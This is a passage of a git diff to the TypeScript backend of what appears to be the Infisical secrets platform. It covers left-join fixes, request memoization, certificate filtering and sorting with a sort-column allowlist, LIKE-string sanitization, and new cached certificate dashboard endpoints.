projectBotDALFactory = (db: TDbClient) => { .join(TableName.Users, `${TableName.Membership}.actorUserId`, `${TableName.Users}.id`) .join(TableName.ProjectKeys, `${TableName.Membership}.actorUserId`, `${TableName.ProjectKeys}.receiverId`) .where(`${TableName.ProjectKeys}.projectId` as "projectId", projectId) - .join( + .leftJoin( TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id` ) - .join( + .leftJoin( db(TableName.UserEncryptionKey).as("senderUserEncryption"), `${TableName.ProjectKeys}.senderId`, `senderUserEncryption.userId` diff --git a/backend/src/services/project-env/project-env-service.ts b/backend/src/services/project-env/project-env-service.ts index c402b603027..8b7a6cae431 100644 --- a/backend/src/services/project-env/project-env-service.ts +++ b/backend/src/services/project-env/project-env-service.ts @@ -6,11 +6,10 @@ import { TLicenseServiceFactory } from "@app/ee/services/license/license-service import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { TSecretApprovalPolicyEnvironmentDALFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-environment-dal"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; -import { TProjectDALFactory } from "../project/project-dal"; import { TSecretFolderDALFactory } from "../secret-folder/secret-folder-dal"; import { TProjectEnvDALFactory } from "./project-env-dal"; import { TCreateEnvDTO, TDeleteEnvDTO, TGetEnvDTO, TUpdateEnvDTO } from "./project-env-types"; @@ -18,7 +17,6 @@ import { TCreateEnvDTO, TDeleteEnvDTO, TGetEnvDTO, TUpdateEnvDTO } from "./proje type 
TProjectEnvServiceFactoryDep = { projectEnvDAL: TProjectEnvDALFactory; folderDAL: Pick; - projectDAL: Pick; permissionService: Pick; licenseService: Pick; keyStore: Pick; @@ -33,7 +31,6 @@ export const projectEnvServiceFactory = ({ permissionService, licenseService, keyStore, - projectDAL, folderDAL, accessApprovalPolicyEnvironmentDAL, secretApprovalPolicyEnvironmentDAL @@ -80,8 +77,9 @@ export const projectEnvServiceFactory = ({ name: "CreateEnvironment" }); - const project = await projectDAL.findById(projectId); - const plan = await licenseService.getPlan(project.orgId); + // getProjectPermission above guarantees project existence and org membership, + // so actorOrgId === project.orgId β€” no separate project lookup needed. + const plan = await licenseService.getPlan(actorOrgId); if (plan.environmentLimit !== null && envs.length >= plan.environmentLimit) { // case: limit imposed on number of environments allowed // case: number of environments used exceeds the number of environments allowed @@ -116,7 +114,7 @@ export const projectEnvServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.WaitUntilReadyProjectEnvironmentOperation(projectId), - 10, + KeyStoreTtls.ProjectEnvironmentOperationMarkerInSeconds, "true" ); @@ -178,8 +176,9 @@ export const projectEnvServiceFactory = ({ } const envs = await projectEnvDAL.find({ projectId }); - const project = await projectDAL.findById(projectId); - const plan = await licenseService.getPlan(project.orgId); + // getProjectPermission above guarantees project existence and org membership, + // so actorOrgId === project.orgId β€” no separate project lookup needed. 
+ const plan = await licenseService.getPlan(actorOrgId); if (plan.environmentLimit !== null && envs.length > plan.environmentLimit) { // case: limit imposed on number of environments allowed // case: number of environments used exceeds the number of environments allowed @@ -202,7 +201,7 @@ export const projectEnvServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.WaitUntilReadyProjectEnvironmentOperation(projectId), - 10, + KeyStoreTtls.ProjectEnvironmentOperationMarkerInSeconds, "true" ); @@ -264,7 +263,7 @@ export const projectEnvServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.WaitUntilReadyProjectEnvironmentOperation(projectId), - 10, + KeyStoreTtls.ProjectEnvironmentOperationMarkerInSeconds, "true" ); diff --git a/backend/src/services/project-key/project-key-dal.ts b/backend/src/services/project-key/project-key-dal.ts index 07d061e9549..54cb949745d 100644 --- a/backend/src/services/project-key/project-key-dal.ts +++ b/backend/src/services/project-key/project-key-dal.ts @@ -18,7 +18,7 @@ export const projectKeyDALFactory = (db: TDbClient) => { try { const projectKey = await (tx || db.replicaNode())(TableName.ProjectKeys) .join(TableName.Users, `${TableName.ProjectKeys}.senderId`, `${TableName.Users}.id`) - .join(TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id`) + .leftJoin(TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id`) .where({ projectId, receiverId: userId }) .orderBy("createdAt", "desc", "last") .select(selectAllTableCols(TableName.ProjectKeys)) @@ -38,7 +38,7 @@ export const projectKeyDALFactory = (db: TDbClient) => { .where(`${TableName.Membership}.scopeProjectId` as "scopeProjectId", projectId) .where(`${TableName.Membership}.scope`, AccessScope.Project) .join(TableName.Users, `${TableName.Membership}.actorUserId`, `${TableName.Users}.id`) - .join(TableName.UserEncryptionKey, `${TableName.Users}.id`, 
`${TableName.UserEncryptionKey}.userId`) + .leftJoin(TableName.UserEncryptionKey, `${TableName.Users}.id`, `${TableName.UserEncryptionKey}.userId`) .select(db.ref("userId").withSchema(TableName.Users), "publicKey"); return pubKeys; } catch (error) { diff --git a/backend/src/services/project-membership/project-membership-dal.ts b/backend/src/services/project-membership/project-membership-dal.ts index b2e51bedd38..87c6f4c9eee 100644 --- a/backend/src/services/project-membership/project-membership-dal.ts +++ b/backend/src/services/project-membership/project-membership-dal.ts @@ -305,7 +305,7 @@ export const projectMembershipDALFactory = (db: TDbClient) => { .join(TableName.Users, `${TableName.Membership}.actorUserId`, `${TableName.Users}.id`) .whereIn(`${TableName.Users}.id`, userIds) .where(`${TableName.Project}.orgId`, orgId) - .join( + .leftJoin( TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id` diff --git a/backend/src/services/project-membership/project-membership-service.ts b/backend/src/services/project-membership/project-membership-service.ts index 256bed87a91..14d27851ebd 100644 --- a/backend/src/services/project-membership/project-membership-service.ts +++ b/backend/src/services/project-membership/project-membership-service.ts @@ -8,6 +8,8 @@ import { ProjectPermissionMemberActions, ProjectPermissionSub } from "@app/ee/se import { getConfig } from "@app/lib/config/env"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { groupBy } from "@app/lib/fn"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TAccessApprovalPolicyApproverDALFactory } from "../../ee/services/access-approval-policy/access-approval-policy-approver-dal"; import { TAccessApprovalPolicyDALFactory } from "../../ee/services/access-approval-policy/access-approval-policy-dal"; @@ -36,10 +38,7 @@ import { } from 
"./project-membership-types"; type TProjectMembershipServiceFactoryDep = { - permissionService: Pick< - TPermissionServiceFactory, - "getProjectPermission" | "getProjectPermissionByRoles" | "invalidateProjectPermissionCache" - >; + permissionService: Pick; smtpService: TSmtpService; projectMembershipDAL: TProjectMembershipDALFactory; membershipUserDAL: TMembershipUserDALFactory; @@ -198,9 +197,6 @@ export const projectMembershipServiceFactory = ({ members, sendEmails = true }: TAddUsersToWorkspaceDTO) => { - const project = await projectDAL.findById(projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -210,8 +206,11 @@ export const projectMembershipServiceFactory = ({ actionProjectType: ActionProjectType.Any }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionMemberActions.Create, ProjectPermissionSub.Member); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const orgMembers = await membershipUserDAL.find({ - [`${TableName.Membership}.scopeOrgId` as "scopeOrgId"]: project.orgId, + [`${TableName.Membership}.scopeOrgId` as "scopeOrgId"]: actorOrgId, scope: AccessScope.Organization, $in: { [`${TableName.Membership}.id` as "id"]: members.map(({ orgMembershipId }) => orgMembershipId) @@ -245,7 +244,7 @@ export const projectMembershipServiceFactory = ({ scopeProjectId: projectId, actorUserId, scope: AccessScope.Project, - scopeOrgId: project.orgId + scopeOrgId: actorOrgId })), tx ); @@ -268,13 +267,11 @@ export const projectMembershipServiceFactory = ({ ); }); - await permissionService.invalidateProjectPermissionCache(projectId); - if (sendEmails) { await notificationService.createUserNotifications( orgMembershipUsernames.map((member) => ({ userId: member.id, - orgId: project.orgId, + orgId: actorOrgId, type: 
NotificationType.PROJECT_INVITATION, title: "Project Invitation", body: `You've been invited to join the project **${project.name}**.` @@ -314,14 +311,6 @@ export const projectMembershipServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionMemberActions.Delete, ProjectPermissionSub.Member); - const project = await projectDAL.findById(projectId); - - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const usernamesAndEmails = [...emails, ...usernames]; const projectMembers = await projectMembershipDAL.findMembershipsByUsername(projectId, [ @@ -400,8 +389,6 @@ export const projectMembershipServiceFactory = ({ return deletedMemberships; }); - await permissionService.invalidateProjectPermissionCache(projectId); - return memberships; }; @@ -410,7 +397,9 @@ export const projectMembershipServiceFactory = ({ throw new BadRequestError({ message: "Only users can leave projects" }); } - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); if (project.version === ProjectVersion.V1) { diff --git a/backend/src/services/project-role/project-role-fns.ts b/backend/src/services/project-role/project-role-fns.ts index 4dfcf960b70..f8157acbe13 100644 --- a/backend/src/services/project-role/project-role-fns.ts +++ b/backend/src/services/project-role/project-role-fns.ts @@ -26,7 +26,7 @@ export const getPredefinedRoles = ({ projectId, projectType, roleFilter }: TGetP { id: uuidv4(), projectId, - name: "Developer", + name: "Member", slug: ProjectMembershipRole.Member, permissions: projectMemberPermissions, description: "Limited read/write role in a project", diff --git a/backend/src/services/project/project-dal.ts b/backend/src/services/project/project-dal.ts index 
d491af4c8c1..fd02d98d2f6 100644 --- a/backend/src/services/project/project-dal.ts +++ b/backend/src/services/project/project-dal.ts @@ -13,6 +13,7 @@ import { TProjectsUpdate } from "@app/db/schemas"; import { BadRequestError, DatabaseError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { ActorType } from "../auth/auth-type"; @@ -414,7 +415,7 @@ export const projectDALFactory = (db: TDbClient) => { void query.where(`${TableName.Project}.type`, dto.type); } if (dto.name) { - void query.whereILike(`${TableName.Project}.name`, `%${dto.name}%`); + void query.whereILike(`${TableName.Project}.name`, `%${sanitizeSqlLikeString(dto.name)}%`); } if (dto.projectIds?.length) { diff --git a/backend/src/services/project/project-service.ts b/backend/src/services/project/project-service.ts index e46e7421320..0694687c9c4 100644 --- a/backend/src/services/project/project-service.ts +++ b/backend/src/services/project/project-service.ts @@ -40,7 +40,8 @@ import { TSshCertificateDALFactory } from "@app/ee/services/ssh-certificate/ssh- import { TSshCertificateTemplateDALFactory } from "@app/ee/services/ssh-certificate-template/ssh-certificate-template-dal"; import { TSshHostDALFactory } from "@app/ee/services/ssh-host/ssh-host-dal"; import { TSshHostGroupDALFactory } from "@app/ee/services/ssh-host-group/ssh-host-group-dal"; -import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { withCache } from "@app/lib/cache/with-cache"; import { getProcessedPermissionRules } from "@app/lib/casl/permission-filter-utils"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; @@ -48,6 +49,8 @@ import { DatabaseErrorCode } from 
"@app/lib/error-codes"; import { BadRequestError, DatabaseError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { groupBy } from "@app/lib/fn"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TProjectPermission } from "@app/lib/types"; import { TPkiSubscriberDALFactory } from "@app/services/pki-subscriber/pki-subscriber-dal"; @@ -91,6 +94,8 @@ import { TCreateProjectDTO, TDeleteProjectDTO, TDeleteProjectWorkflowIntegration, + TGetActivityTrendDTO, + TGetDashboardStatsDTO, TGetProjectDTO, TGetProjectKmsKey, TGetProjectSshConfig, @@ -162,6 +167,9 @@ type TProjectServiceFactoryDep = { | "findWithPrivateKeyInfo" | "findActiveCertificatesForSync" | "countActiveCertificatesForSync" + | "getDashboardStats" + | "getActivityTrend" + | "getPqcTrend" >; certificateTemplateDAL: Pick; pkiAlertDAL: Pick; @@ -176,7 +184,7 @@ type TProjectServiceFactoryDep = { licenseService: Pick; smtpService: Pick; orgDAL: Pick; - keyStore: Pick; + keyStore: Pick; roleDAL: Pick; kmsService: Pick< TKmsServiceFactory, @@ -717,7 +725,7 @@ export const projectServiceFactory = ({ }; }); - await keyStore.deleteItem(`infisical-cloud-plan-${actorOrgId}`); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(actorOrgId)); return results; }; @@ -791,7 +799,7 @@ export const projectServiceFactory = ({ return delProject; }); - await keyStore.deleteItem(`infisical-cloud-plan-${actorOrgId}`); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(actorOrgId)); return deletedProject; } finally { await lock.release(); @@ -1212,6 +1220,18 @@ export const projectServiceFactory = ({ toDate, metadataFilter, extendedKeyUsage, + keyAlgorithm, + signatureAlgorithm, + keySizes, + caIds, + enrollmentTypes, + source, + notAfterFrom, + notAfterTo, + notBeforeFrom, + notBeforeTo, + sortBy, + sortOrder, actorId, actorOrgId, 
actorAuthMethod, @@ -1240,12 +1260,24 @@ export const projectServiceFactory = ({ ...(friendlyName && { friendlyName }), ...(commonName && { commonName }), ...(search && { search }), - ...(status && { status: Array.isArray(status) ? status[0] : status }), + ...(status && { + status: Array.isArray(status) ? status : status.split(",").map((s) => s.trim()) + }), ...(profileIds && { profileIds }), ...(fromDate && { fromDate }), ...(toDate && { toDate }), ...(metadataFilter && { metadataFilter }), - ...(extendedKeyUsage && { extendedKeyUsage }) + ...(extendedKeyUsage && { extendedKeyUsage }), + ...(keyAlgorithm && { keyAlgorithm }), + ...(signatureAlgorithm && { signatureAlgorithm }), + ...(keySizes && keySizes.length > 0 && { keySizes }), + ...(caIds && { caIds }), + ...(enrollmentTypes && { enrollmentTypes }), + ...(source && { source }), + ...(notAfterFrom && { notAfterFrom }), + ...(notAfterTo && { notAfterTo }), + ...(notBeforeFrom && { notBeforeFrom }), + ...(notBeforeTo && { notBeforeTo }) }; const permissionFilters = getProcessedPermissionRules( permission, @@ -1253,6 +1285,18 @@ export const projectServiceFactory = ({ ProjectPermissionSub.Certificates ); + const ALLOWED_SORT_COLUMNS = new Set([ + "notAfter", + "notBefore", + "createdAt", + "commonName", + "serialNumber", + "keyAlgorithm", + "status" + ]); + const validatedSortBy = sortBy && ALLOWED_SORT_COLUMNS.has(sortBy) ? sortBy : "notAfter"; + const validatedSortOrder = sortOrder === "asc" ? "asc" : "desc"; + const certificates = forPkiSync ? 
await certificateDAL.findActiveCertificatesForSync(regularFilters, { offset, limit }, permissionFilters) : await certificateDAL.findWithPrivateKeyInfo( @@ -1260,7 +1304,7 @@ export const projectServiceFactory = ({ { offset, limit, - sort: [["notAfter", "desc"]] + sort: [[validatedSortBy, validatedSortOrder]] }, permissionFilters ); @@ -1270,17 +1314,27 @@ export const projectServiceFactory = ({ ...(regularFilters.friendlyName && { friendlyName: String(regularFilters.friendlyName) }), ...(regularFilters.commonName && { commonName: String(regularFilters.commonName) }), ...(regularFilters.search && { search: String(regularFilters.search) }), - ...(regularFilters.status && { status: String(regularFilters.status) }), + ...(regularFilters.status && { status: regularFilters.status }), ...(regularFilters.profileIds && { profileIds: regularFilters.profileIds }), ...(regularFilters.fromDate && { fromDate: regularFilters.fromDate }), ...(regularFilters.toDate && { toDate: regularFilters.toDate }), ...(regularFilters.metadataFilter && { metadataFilter: regularFilters.metadataFilter }), - ...(regularFilters.extendedKeyUsage && { extendedKeyUsage: String(regularFilters.extendedKeyUsage) }) + ...(regularFilters.extendedKeyUsage && { extendedKeyUsage: String(regularFilters.extendedKeyUsage) }), + ...(regularFilters.keyAlgorithm && { keyAlgorithm: regularFilters.keyAlgorithm }), + ...(regularFilters.signatureAlgorithm && { signatureAlgorithm: String(regularFilters.signatureAlgorithm) }), + ...(regularFilters.keySizes && { keySizes: regularFilters.keySizes }), + ...(regularFilters.caIds && { caIds: regularFilters.caIds }), + ...(regularFilters.enrollmentTypes && { enrollmentTypes: regularFilters.enrollmentTypes }), + ...(regularFilters.source && { source: regularFilters.source }), + ...(regularFilters.notAfterFrom && { notAfterFrom: regularFilters.notAfterFrom }), + ...(regularFilters.notAfterTo && { notAfterTo: regularFilters.notAfterTo }), + ...(regularFilters.notBeforeFrom && { 
notBeforeFrom: regularFilters.notBeforeFrom }), + ...(regularFilters.notBeforeTo && { notBeforeTo: regularFilters.notBeforeTo }) }; const count = forPkiSync ? await certificateDAL.countActiveCertificatesForSync(countFilter) - : await certificateDAL.countCertificatesInProject(countFilter); + : await certificateDAL.countCertificatesInProject(countFilter, permissionFilters); return { certificates, @@ -1288,6 +1342,104 @@ export const projectServiceFactory = ({ }; }; + const getDashboardStats = async ({ filter, actorId, actorOrgId, actorAuthMethod, actor }: TGetDashboardStatsDTO) => { + const project = await projectDAL.findProjectByFilter(filter); + const projectId = project.id; + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Read, + ProjectPermissionSub.Certificates + ); + + return withCache({ + keyStore, + key: KeyStorePrefixes.CertDashboardStats(projectId), + ttlSeconds: KeyStoreTtls.DashboardCacheInSeconds, + fetcher: () => certificateDAL.getDashboardStats(projectId) + }); + }; + + const getActivityTrend = async ({ + filter, + range = "30d", + actorId, + actorOrgId, + actorAuthMethod, + actor + }: TGetActivityTrendDTO) => { + const project = await projectDAL.findProjectByFilter(filter); + const projectId = project.id; + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Read, + ProjectPermissionSub.Certificates + ); + + const rangeDaysMap: Record = { "7d": 7, "30d": 30, "6m": 180 }; + const daysBack = rangeDaysMap[range]; + + return withCache({ + keyStore, + key: 
KeyStorePrefixes.CertActivityTrend(projectId, range), + ttlSeconds: KeyStoreTtls.DashboardCacheInSeconds, + fetcher: () => certificateDAL.getActivityTrend(projectId, daysBack) + }); + }; + + const getPqcTrend = async ({ + filter, + range = "30d", + actorId, + actorOrgId, + actorAuthMethod, + actor + }: TGetActivityTrendDTO) => { + const project = await projectDAL.findProjectByFilter(filter); + const projectId = project.id; + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Read, + ProjectPermissionSub.Certificates + ); + + const rangeDaysMap: Record = { "7d": 7, "30d": 30, "6m": 180 }; + const daysBack = rangeDaysMap[range]; + + return withCache({ + keyStore, + key: KeyStorePrefixes.CertPqcTrend(projectId, range), + ttlSeconds: KeyStoreTtls.DashboardCacheInSeconds, + fetcher: () => certificateDAL.getPqcTrend(projectId, daysBack) + }); + }; + /** * Return list of (PKI) alerts configured for project */ @@ -1703,13 +1855,6 @@ export const projectServiceFactory = ({ actorAuthMethod, projectId }: TGetProjectSshConfig) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -1722,12 +1867,12 @@ export const projectServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.Settings); const projectSshConfig = await projectSshConfigDAL.findOne({ - projectId: project.id + projectId }); if (!projectSshConfig) { throw new NotFoundError({ - message: `Project SSH config with ID '${project.id}' not found` + message: `Project SSH config with ID '${projectId}' not found` }); } @@ 
-1743,13 +1888,6 @@ export const projectServiceFactory = ({ defaultUserSshCaId, defaultHostSshCaId }: TUpdateProjectSshConfig) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -1762,12 +1900,12 @@ export const projectServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Edit, ProjectPermissionSub.Settings); let projectSshConfig = await projectSshConfigDAL.findOne({ - projectId: project.id + projectId }); if (!projectSshConfig) { throw new NotFoundError({ - message: `Project SSH config with ID '${project.id}' not found` + message: `Project SSH config with ID '${projectId}' not found` }); } @@ -1776,7 +1914,7 @@ export const projectServiceFactory = ({ const userSshCa = await sshCertificateAuthorityDAL.findOne( { id: defaultUserSshCaId, - projectId: project.id + projectId }, tx ); @@ -1792,7 +1930,7 @@ export const projectServiceFactory = ({ const hostSshCa = await sshCertificateAuthorityDAL.findOne( { id: defaultHostSshCaId, - projectId: project.id + projectId }, tx ); @@ -1827,13 +1965,6 @@ export const projectServiceFactory = ({ projectId, integration }: TGetProjectWorkflowIntegrationConfig) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -1847,7 +1978,7 @@ export const projectServiceFactory = ({ if (integration === WorkflowIntegration.SLACK) { const config = await projectSlackConfigDAL.findOne({ - projectId: project.id + projectId }); if (!config) { @@ -1865,7 +1996,7 @@ export const projectServiceFactory = ({ if (integration === WorkflowIntegration.MICROSOFT_TEAMS) { const config = await 
projectMicrosoftTeamsConfigDAL.findOne({ - projectId: project.id + projectId }); if (!config) { @@ -1905,7 +2036,9 @@ export const projectServiceFactory = ({ isSecretSyncErrorNotificationEnabled?: boolean; secretSyncErrorChannels?: string; }) => { - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) { throw new NotFoundError({ message: `Project with ID '${projectId}' not found` @@ -2114,13 +2247,6 @@ export const projectServiceFactory = ({ integrationId, integration }: TDeleteProjectWorkflowIntegration) => { - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -2262,7 +2388,9 @@ export const projectServiceFactory = ({ } const org = await orgDAL.findOne({ id: permission.orgId }); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const userDetails = await userDAL.findById(permission.id); const appCfg = getConfig(); @@ -2316,6 +2444,9 @@ export const projectServiceFactory = ({ upgradeProject, listProjectCas, listProjectCertificates, + getDashboardStats, + getActivityTrend, + getPqcTrend, listProjectAlerts, listProjectPkiCollections, listProjectCertificateTemplates, diff --git a/backend/src/services/project/project-types.ts b/backend/src/services/project/project-types.ts index cd35ab114b0..59f8fe8a3c4 100644 --- a/backend/src/services/project/project-types.ts +++ b/backend/src/services/project/project-types.ts @@ -152,6 +152,27 @@ export type TListProjectCertsDTO = { toDate?: Date; metadataFilter?: Array<{ key: string; value?: string }>; extendedKeyUsage?: string; + keyAlgorithm?: string | 
string[]; + signatureAlgorithm?: string; + keySizes?: number[]; + caIds?: string[]; + enrollmentTypes?: string[]; + source?: string | string[]; + notAfterFrom?: Date; + notAfterTo?: Date; + notBeforeFrom?: Date; + notBeforeTo?: Date; + sortBy?: string; + sortOrder?: "asc" | "desc"; +} & Omit; + +export type TGetDashboardStatsDTO = { + filter: Filter; +} & Omit; + +export type TGetActivityTrendDTO = { + filter: Filter; + range?: string; } & Omit; export type TListProjectAlertsDTO = TProjectPermission; diff --git a/backend/src/services/reminder/reminder-dal.ts b/backend/src/services/reminder/reminder-dal.ts index 4161552a95e..bad70197169 100644 --- a/backend/src/services/reminder/reminder-dal.ts +++ b/backend/src/services/reminder/reminder-dal.ts @@ -148,11 +148,58 @@ export const reminderDALFactory = (db: TDbClient) => { return reminders; }; + const findByProjectAndDateRange = async ( + { + projectId, + startDate, + endDate + }: { + projectId: string; + startDate: Date; + endDate: Date; + }, + tx?: Knex + ) => { + const query = (tx || db.replicaNode())(TableName.Reminder) + .whereNotNull(`${TableName.Reminder}.secretId`) + .whereBetween(`${TableName.Reminder}.nextReminderDate`, [startDate, endDate]) + .join(TableName.SecretV2, `${TableName.Reminder}.secretId`, `${TableName.SecretV2}.id`) + .join(TableName.SecretFolder, `${TableName.SecretV2}.folderId`, `${TableName.SecretFolder}.id`) + .join( + TableName.Environment, + `${TableName.SecretFolder}.envId`, + `${TableName.Environment}.id` + ) + .where(`${TableName.Environment}.projectId`, projectId); + + const rawReminders = await query + .select(selectAllTableCols(TableName.Reminder)) + .select( + db.ref("key").withSchema(TableName.SecretV2).as("secretKey"), + db.ref("folderId").withSchema(TableName.SecretV2).as("secretFolderId"), + db.ref("slug").withSchema(TableName.Environment).as("envSlug"), + db.ref("name").withSchema(TableName.Environment).as("envName") + ); + + return rawReminders.map((r) => ({ + id: r.id, + 
secretId: r.secretId, + secretKey: (r as unknown as Record).secretKey, + nextReminderDate: r.nextReminderDate, + message: r.message, + repeatDays: r.repeatDays, + folderId: (r as unknown as Record).secretFolderId, + envSlug: (r as unknown as Record).envSlug, + envName: (r as unknown as Record).envName + })); + }; + return { ...reminderOrm, findSecretDailyReminders, findUpcomingReminders, findSecretReminder, - findSecretReminders + findSecretReminders, + findByProjectAndDateRange }; }; diff --git a/backend/src/services/role/project/project-role-factory.ts b/backend/src/services/role/project/project-role-factory.ts index 2ab4e59d034..ce74c47fdb7 100644 --- a/backend/src/services/role/project/project-role-factory.ts +++ b/backend/src/services/role/project/project-role-factory.ts @@ -17,6 +17,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TRoleScopeFactory } from "../role-types"; @@ -119,7 +121,9 @@ export const newProjectRoleFactory = ({ const getPredefinedRoles: TRoleScopeFactory["getPredefinedRoles"] = async (scopeData) => { const scope = getScopeField(scopeData); - const project = await projectDAL.findById(scope.value); + const project = await requestMemoize(requestMemoKeys.projectFindById(scope.value), () => + projectDAL.findById(scope.value) + ); if (!project) throw new BadRequestError({ message: "Project not found" }); const projectId = project.id; @@ -136,7 +140,7 @@ export const newProjectRoleFactory = ({ }, { id: uuidv4(), - name: "Developer", + name: "Member", slug: ProjectMembershipRole.Member, permissions: projectMemberPermissions, description: "Limited read/write role in a project", diff --git 
a/backend/src/services/secret-folder/secret-folder-dal.ts b/backend/src/services/secret-folder/secret-folder-dal.ts index 29d69ec6ba1..076095f2fd3 100644 --- a/backend/src/services/secret-folder/secret-folder-dal.ts +++ b/backend/src/services/secret-folder/secret-folder-dal.ts @@ -3,7 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TSecretFolders, TSecretFoldersUpdate } from "@app/db/schemas"; import { BadRequestError, DatabaseError } from "@app/lib/errors"; -import { groupBy, removeTrailingSlash, unique } from "@app/lib/fn"; +import { groupBy, removeTrailingSlash, sanitizeSqlLikeString, unique } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; import { OrderByDirection } from "@app/lib/types"; import { isValidSecretPath } from "@app/lib/validator"; @@ -340,7 +340,7 @@ export const secretFolderDALFactory = (db: TDbClient) => { .where("isReserved", false) .where((bd) => { if (search) { - void bd.whereILike(`${TableName.SecretFolder}.name`, `%${search}%`); + void bd.whereILike(`${TableName.SecretFolder}.name`, `%${sanitizeSqlLikeString(search)}%`); } }) .leftJoin(TableName.Environment, `${TableName.Environment}.id`, `${TableName.SecretFolder}.envId`) diff --git a/backend/src/services/secret-folder/secret-folder-service.ts b/backend/src/services/secret-folder/secret-folder-service.ts index 033efdb14c3..7d50494516d 100644 --- a/backend/src/services/secret-folder/secret-folder-service.ts +++ b/backend/src/services/secret-folder/secret-folder-service.ts @@ -231,19 +231,19 @@ export const secretFolderServiceFactory = ({ tx ); - return doc; - }); + const [folderWithFullPath] = await folderDAL.findSecretPathByFolderIds(projectId, [doc.id], tx); - const [folderWithFullPath] = await folderDAL.findSecretPathByFolderIds(projectId, [folder.id]); + if (!folderWithFullPath) { + throw new NotFoundError({ + message: `Failed to retrieve path for folder with ID '${doc.id}'` + }); + } - if 
